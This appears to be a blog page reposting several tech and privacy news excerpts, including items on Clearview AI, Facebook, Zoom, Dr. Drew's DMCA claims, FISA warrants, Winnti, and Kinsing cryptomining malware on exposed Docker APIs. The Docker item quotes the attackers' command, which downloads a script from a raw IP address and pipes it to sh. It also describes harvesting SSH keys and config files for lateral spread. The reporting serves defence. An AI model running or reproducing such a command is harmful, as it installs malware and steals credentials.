Founder Hoan Ton-That’s has links to the far-right movement that move right past suspicious into obvious, according to HuffPo. He reportedly attended a 2016 dinner with white supremacist Richard Spencer and organized by alt-right financier Jeff Giesea, an associate of Palantir founder and Trump-supporting billionaire Peter Thiel. (Thiel secretly bankrolled a lawsuit that bankrupted Gizmodo’s former parent company, Gawker Media.) Ton-That was also a member of a Slack channel run by professional troll Chuck Johnson for his now-defunct WeSearchr, a crowdfunding platform primarily used by white supremacists; that channel included people like the webmaster of neo-Nazi site Daily Stormer, Andrew Auernheimer, and conspiracy theorist Mike Cernovich,

Per HuffPo, in January 2017 Johnson posted on Facebook that he was working on “building algorithms to ID all the illegal immigrants for the deportation squads.” Another source told HuffPo that they had seen him bragging about that work to “a whole bunch of really important people” at Trump’s DC hotel that spring, introducing them to a man the source identified as almost certainly being Ton-That.

Johnson, who was involved with Trump’s transition team, also hit up then-Breitbart employee Katie McHugh, who at that time was a white supremacist but has since left the movement. McHugh told HuffPo that Johnson asked to be put in contact with ghoulish Trump adviser Stephen Miller so he could tout a “way to identify every illegal alien in the country.” (It’s unclear whether that happened, but Clearview’s clients include Immigration and Customs Enforcement and the FBI.) That same year, Thiel invested $200,000 in Clearview.

Smartcheckr’s labor pool also included many ethnonationalists who believe in purging the U.S. of nonwhites, according to HuffPo. One of those was hardcore racist and Johnson associate Tyler Bass, who described himself as an “investigator” doing “remote software testing” for the app and whose LinkedIn posts suggest may have had access to law enforcement data associated with criminal investigations as late as 2018. Bass also claimed to McHugh to have been in attendance at a disastrous far-right rally in Charlottesville, Virginia in 2017, where a neo-Nazi terror attack killed protester Heather Heyer and wounded scores of others.

Another was Douglass Mackey, the overseer of a vast online racist propaganda operation under the moniker “Ricky Vaughn,” had a role as a contract consultant for Smartcheckr. While there, he touted the use of its face recognition tools to anti-Semitic congressional candidate Paul Nehlen for extreme campaign opposition research. (Ton-That told HuffPo that Mackey was only a contractor for three weeks and his offer to Nehlen was unauthorized, though Smartcheckr employees took steps to distance themselves from Mackey after he was outed as “Ricky Vaughn” in 2018.)

There was also Marko Jukic, HuffPo wrote, a Clearview AI employee who marketed its products to police departments and had a history as a prolific contributor to extremist blogs, including a post where he advocated “segregation and separation” of Jews. One of Clearview’s lawyers, Tor Ekeland, is best known for representing far-right provocateurs and racists like Auernheimer.

Johnson appears to have had access to WeSearchr until at least January 2020, when he showed a fellow passenger on a flight to Boston a powerful face recognition app on his phone, according to a BuzzFeed report. In a statement to HuffPo, Ton-That denied that Johnson was an “executive, employee, consultant” or board member of Clearview, though he didn’t clarify whether Johnson holds equity in the company. He also told the site that Clearview has severed ties with Bass and Jukic, claiming he was “shocked by and completely unaware of Marko Jukic’s online writings under a different name.” (Jukic used the same pseudonym to talk with Ton-That on Slack and email that he did in his racist blog posts, HuffPo noted.)

Ton-That also told the site that he grew up on the internet, which “not always served me well” during his upbringing, ad“There was a period when I explored a range of ideas—not out of belief in any of them, but out of a desire to search for self and place in the world. I have finally found it, and the mission to help make America a safer place. To those who have read my words in the Huffington Post article, I deeply apologize for them.”

Clearview built its face recognition database by scraping photos en masse from public social media posts, a practice that is technically legal but could expose it to significant civil liability from rights holders. While scraping is legal, Clearview’s business practices have resulted in cease-and-desists from Silicon Valley giants like Google, and may have run afoul of other laws. The state attorney general of Vermont filed a lawsuit against the company last month alleging violations of the Vermont Consumer Protection Act and a state data broker law, while the AG of New Jersey ordered all police in the state to stop using Clearview products. Canadian privacy commissioners are investigating the company; it is also facing two class action lawsuits, one of which alleges that the company violated Illinois biometrics laws.

Source: Creepy Face Recognition Firm Clearview AI Sure Has a Lot of Ties to the Far Right

If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it

Posted on by

Some Docker installations are getting hammered by malware skiddies hoping to mine digital cash using other people’s CPU time.

Infosec outfit Aqua – no, not the Barbie Girl band – said miscreants have spotted that a decent number of Docker deployments are lazily or inadvertently exposing the daemon API port to the public internet with no protection. It’s a fairly common error that hackers have exploited in the past to mine digital coins, although lately we’re told there have been thousands of infection attempts daily via this interface, all involving a piece of Linux malware dubbed Kinsing.

“These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date,” noted researcher Gal Singer this week.

“We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.”

If an open system is found, the attacker tells it to create and run a custom Ubuntu container that executes the following command:

/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null

The fetched d.sh script disables SELINUX security protections, as well as searches out and removes any other malware or cryptomining containers already running on the infected machine. That way it won’t have to compete for CPU time. It uses crontab to ensure it stays running every minute, and a bunch of other stuff: it’s 600 lines long.

The script also downloads the Kinsing malware proper, and runs it. This software nasty tries to make contact with one of four command and control servers in Eastern Europe for any special orders to carry out on the infected system. It also runs a script, called spre.sh, that uses any SSH keys it finds to log into and spread to other machines to run its code.

“The spre.sh shell script that the malware downloads is used to laterally spread the malware across the container network,” Aqua’s Singer said.

“In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets.”

Once that is done, the mining component of the malware is finally executed.

Kinsing malware diagram

A diagram of the attack process
click to enlarge

The Register has pinged Docker for comment on the attacks. In the meantime, Singer and Aqua recommend blocking the IP addresses linked to this outbreak. It’s also highly recommended you don’t leave the daemon API port facing the internet, and use policies and configurations to limit what systems are allowed to talk to the interface.

“Identify all cloud resources and group them by some logical structure,” said the team. “Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege. Investigate logs, mostly around user actions, look for actions you can’t account for anomalies.” ®

Source: If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it • The Register

Facebook asks users about coronavirus symptoms, releases friendship data to researchers

Posted on by

Facebook Inc said on Monday it would start surveying some U.S. users about their health as part of a Carnegie Mellon University research project aimed at generating “heat maps” of self-reported coronavirus infections.

The social media giant will display a link at the top of users’ News Feeds directing them to the survey, which the researchers say will help them predict where medical resources are needed. Facebook said it may make surveys available to users in other countries too, if the approach is successful.

Alphabet Inc’s Google, Facebook’s rival in mobile advertising, began querying users for the Carnegie Mellon project last month through its Opinion Rewards app, which exchanges responses to surveys from Google and its clients for app store credit.

Facebook said in a blog post that the Carnegie Mellon researchers “won’t share individual survey responses with Facebook, and Facebook won’t share information about who you are with the researchers.”

The company also said it would begin making new categories of data available to epidemiologists through its Disease Prevention Maps program, which is sharing aggregated location data with partners in 40 countries working on COVID-19 response.

Researchers use the data to provide daily updates on how people are moving around in different areas to authorities in those countries, along with officials in a handful of U.S. cities and states.

In addition to location data, the company will begin making available a “social connectedness index” showing the probability that people in different locations are Facebook friends, aggregated at the zip code level.

Laura McGorman, who runs Facebook’s Data for Good program, said the index could be used to assess the economic impact of the new coronavirus, revealing which communities are most likely to get help from neighboring areas and others that may need more targeted support.

New “co-location maps” can similarly reveal the probability that people in one area will come in contact with people in another, Facebook said.

Source: Facebook asks users about coronavirus symptoms, releases friendship data to researchers – Reuters

This might actually be a good way to use all that privacy invading data

Chinas Winnti group stayed under the radar for a decade by aiming for Linux servers

Posted on by

A group of hackers operating as an offshoot of China’s Winnti group managed to stay undetected for more than a decade by going open source.

A report from BlackBerry outlines how the group, actually a collection of five smaller crews of hackers thought to be state-sponsored, assembled in the wake of Winnti and exploited Linux servers, plus the occasional Windows Server box and mobile device, for years.

“The APT groups examined in this report have traditionally pursued different objectives and focused on a wide array of targets,” BlackBerry noted.

“However, it was observed that there is a significant degree of coordination between these groups, particularly where targeting of Linux platforms is concerned, and it is assessed that any organization with a large Linux distribution should not assume they are outside of the target sets for any of these groups.”

First chronicled by researchers back in 2013, the Winnti hacking operation is thought to date back as far as 2009. These groups, described by BlackBerry as “offshoots” of that hacking outfit, have been around for nearly as long and use similar tactics.

Part of the reason the attack has gone unnoticed for so long, BlackBerry reckons, is due to their preference for Linux servers. It is believed the hackers use three different backdoors, two rootkits, and two other build tools that can be used to construct additional rootkits on a per-target basis for open-source servers.

This in addition to the command-and-control tools and what is described as a “massive botnet” of compromised Linux servers and devices. Some of the malware has been in use dating back to 2012.

Source: Want to stay under the radar for a decade or more? This Chinese hacking crew did it… by aiming for Linux servers • The Register

American schools are banning Zoom and switching to Microsoft Teams

Posted on by

After many schools adopted Zoom to conduct online lessons during the coronavirus lockdown, concerns about security and privacy have led to a ban on the video conferencing software across the US.

The chancellor of New York City’s Department of Education Richard A Carranza sent an email to school principals telling them to “cease using Zoom as soon as possible”. And he is not alone; schools in other parts of the country have taken similar action, and educators are now being trained to use Microsoft Teams as this has been suggested as a suitable alternative, partly because it is compliant with FERPA (Family Educational Rights and Privacy Act).

See also:

Large numbers of teachers spent time learning how to use Zoom to continue educating pupils who are confined to their homes. But growing criticism of Zoom for its approach to privacy and security has given cause for a rethink. Documents seen by Chalkbeat show that principals in NYC have been told: “Based on the DOE’s review of those documented concerns, the DOE will no longer permit the use of Zoom at this time”.

The Washington Post quotes Danielle Filson, spokesperson for the NYC Education Department, as saying:

Providing a safe and secure remote learning experience for our students is essential, and upon further review of security concerns, schools should move away from using Zoom as soon as possible. There are many new components to remote learning, and we are making real-time decisions in the best interest of our staff and student. We will support staff and students in transitioning to different platforms such as Microsoft Teams that have the same capabilities with appropriate security measures in place.

The Post also reports that Clark County Public Schools in Nevada were also moving away from Zoom, saying in a statement that the decision had been taken to ” disable access to Zoom out of an abundance of caution due to instances of hacking that created unsafe environments for teachers and students”.

Schools in Utah, Washington state and beyond are also looking into Zoom alternatives.

Source: American schools are banning Zoom and switching to Microsoft Teams

Dr. Drew Pinsky Played Down COVID-19, Then Tries To DMCA Away The Evidence

Posted on by

Update: The full video is now back up and it’s even worse than the original clip we posted. It’s unclear if it went back up thanks to YouTube deciding it was fair use, or Pinsky removing the bogus takedown. Either way, watch it here:

Copyright system supporters keep insisting to me that copyright is never used for censorship, and yet over and over again we keep seeing examples that prove that wrong. The latest is Dr. Drew Pinsky, the somewhat infamous doctor and media personality, who has been one of the more vocal people in the media playing down the impact of the coronavirus. In a video that had gone viral on Twitter and YouTube, it showed many, many, many clips of Dr. Drew insisting that COVID-19 was similar to the flu, and that it wouldn’t be that bad. Assuming it hasn’t been taken down due to a bogus copyright claim, you can hopefully see it below:

As you can see, for well over a month, deep into March when it was blatantly obvious how serious COVID-19 was, he was playing down the threat. Beyond incorrectly comparing it to the flu (saying that it’s “way less virulent than the flu” on February 4th — by which time it was clearly way more virulent than the flu in China), he said the headlines should say “way less serious than influenza,” he insisted that the lethality rate was probably around “0.02%” rather than the 2% being reported. On February 7th, he said your probability of “dying from coronavirus — much higher being hit by an asteroid.” He also mocked government officials for telling people to stay home, even at one point in March saying he was “angry” about a “press-induced panic.” On March 16th, the same day that the Bay Area in California shut down, he insisted that if you’re under 65 you have nothing to worry about, saying “it’s just like the flu.” This was not in the distant past. At one point, a caller to his show, again on March 16th, said that because it’s called COVID-19 that means there were at least 18 others of them, and that’s why no one should worry — and Drew appeared to agree, making it appear he didn’t even know that the 19 refers to the year not the number of coronaviruses, and even though there are other coronaviruses out there, this one was way more infectious and deadly, so it doesn’t matter.

To give him a tiny bit of credit, on Saturday, Pinsky posted a series of choppy videos on Twitter in which he flat out said that he was wrong and he was sorry for his earlier statements, and said that he regretted his earlier statements. He also claimed that he signed up to help in California and NY if he was needed. But, even that apology seems weak in the face of what else he said in those videos… and, more importantly, his actions. In terms of what he said, he kept saying that he always said to listen to Dr. Fauci and to listen to your public health officials. Amazingly, at one point in his apology video, he insists that he thinks the real reason why New York got hit so bad is because of hallways and trains. Yet, in the video above, at one point he literally mocks NYC Mayor de Blasio for telling people to avoid crowded trains, saying: “de Blasio told them not to ride the trains! So they’re not riding the trains! So I am! [guffaw] I mean, it’s ridiculous.”

Given that, it’s a bit difficult to take him seriously when he claims that all along he always said to listen to your public officials, when just a few weeks ago he was mocking them. Indeed, as multiple people have pointed out, the issue here isn’t so much that Pinsky was wrong — in the early days, when there wasn’t as much info, lots of people got things wrong about COVID-19 (though Pinsky kept it up way way after most others recognized how serious it was), but that he acted so totally sure about his opinions that this was nothing to worry about. It was the certainty with which he said what he said that was so much of the problem, including deep into it already being a pandemic with local officials warning people to stay home.

But, even worse, just as he was doing the right thing and mostly apologizing… he was trying to hide those earlier clips that made him look so, so, so bad. His organization began sending out DMCA notices. If you went to the original YouTube upload you got this:

That says: “This video is no longer available due to a copyright claim by Drew Pinsky Inc.” Now, some might argue that it was just some clueless staffer working for Dr. Drew sending off bogus DMCAs, or maybe an automated bot… but nope. Drew himself started tweeting nonsense about copyright law at people. I originally linked to that tweet, but sometime on Sunday, after thousands of people — including some of the most famous lawyers in the country — explained to him why it was nonsense, he deleted it. But I kept a screenshot:

That says, amazingly:

Infringing copywrite laws is a crime. Hang onto your retweets. Or erase to be safe.

The wrongness-to-words ratio in that tweet is pretty fucking astounding. First of all, the layup: it’s copyright, Drew, not copywrite. Make sure you know the name of the fucking law you’re abusing to censor someone before tossing it out there. Second, no, infringing copyright is not a crime. Yes, there is such a thing as criminal copyright infringement, but this ain’t it. Someone posting a video of you would be, at best, civil infringement. For it to be criminal, someone would have to be making copies for profit — like running a bootleg DVD factory or something. Someone posting a 2 minute clip of your nonsense is not that.

Most important, however, this isn’t even civil infringement, thanks to fair use. Putting up a 2 minute video showing a dozen or so clips of Drew making an ass of himself is not infringing. It’s classic fair use — especially given the topic at hand.

So it’s really difficult to believe that Drew is really owning up to his mistakes when at the same time he says he’s sorry, he’s actively working to abuse the law to try to silence people from highlighting his previous comments. Also, someone should point him to Lenz v. Universal in which a court said that before sending a takedown, you need to take fair use into consideration. It certainly appears that Drew hasn’t the foggiest idea how copyright law works, so it seems unlikely he considered fair use at all.

I certainly understand that he likely regrets his earlier comments. And I appreciate his willingness to admit that he was wrong. But to really take ownership of your previous errors, you shouldn’t then be working doubletime to try to delete them from the internet and hide them from view. That’s not taking ownership of your mistakes, that’s trying to sweep them under the rug.

Source: Dr. Drew Pinsky Played Down COVID-19, Then Tries To DMCA Away The Evidence | Techdirt

For the past five years, every FBI secret spy court request to snoop on Americans has sucked, says watchdog

Posted on by

Analysis The FBI has not followed internal rules when applying to spy on US citizens for at least five years, according to an extraordinary report [PDF] by the Department of Justice’s inspector general.

The failure to follow so-called Woods Procedures, designed to make sure the FBI’s submissions for secret spying are correct, puts a question mark over more than 700 approved applications to intercept and log every phone call and email made by named individuals.

Under the current system, the Feds apply to the Foreign Intelligence Surveillance Court (FISC), which can then grant the investigative agency extraordinary spying powers. These can also be granted retroactively if the agency needs to move quickly.

Back in 2001, however, a number of FISA warrants were found to have been granted on unverified information, driving the creation of the Woods Procedures, named after the FBI official who drew them up, Michael Woods.

Following a review last year of one of those successful applications that targeted a Trump campaign staffer called Carter Page, the FBI was found to have made “fundamental and serious errors” in its application. Inspector general Michael Horowitz then expanded his review to another 29 applications dated from October 2014 to September 2019 out of a pool of over 700 and found the same problems in every single other case he looked at, pointing to a systemic problem.

As a result, more than five years’ worth of secret spying activities by the US government may be illegitimate. Horowitz found the same “basic and fundamental errors” in every application.

Unaccountable

The FISA Court has long been highlighted by critics as an unaccountable body with extraordinary powers. Except for very rare occasions, only one side – the government – can present its case to the judges and as a result the court has approved almost every application. The process is wide open to abuse, critics have argued, and so it turns out to have been the case.

The Woods Procedures include things like sufficient supporting documentation of any assertions, a second review of any facts and assertions, and a re-verification of facts whenever an extension is applied for. They are a check and balance on power.

“We do not have confidence that the FBI has executed its Woods Procedures in compliance with FBI policy,” the report states.

It says that it couldn’t review files for four of the 29 selected FISA applications because the FBI has not been able to locate them and, in three of these instances, did not know if the files ever existed.

All of the 25 applications reviewed had “inadequately supported facts,” and “FBI and NSD officials we interviewed indicated to us that there were no efforts by the FBI to use existing FBI and NSD oversight mechanisms.”

Ah yeah but it’s all fixed now

Somewhat amazingly, the FBI doesn’t dispute the findings. The inspector general provided his report to the FBI and prosecutors for their feedback, and appended their responses to the report.

Neither the Feds nor the Dept of Justice denies the assertion that the FBI has not followed its own rules. And both argue that recent proposed changes, prompted solely by the inspector general’s previous report and which critics assert do not go far enough, have effectively fixed the issues.

There is no mention in either response or in the inspector general’s report of what the implications are for the hundreds of people that have been subject to secret spying orders that allow federal agents to track everything that person does and says.

But then, there may not be any implications because under the FISA rules, the person subjected to the spying is not informed of the order against them, even when the spying is over. And they are not even entitled to know or see any evidence compiled against them as a result of the spying operation, even if they are charged as a result of the spying.

It is, in short, a sign that the FBI cannot be trusted to follow its own rules even when those rules apply to the most invasive powers it can be given

Source: For the past five years, every FBI secret spy court request to snoop on Americans has sucked, says watchdog • The Register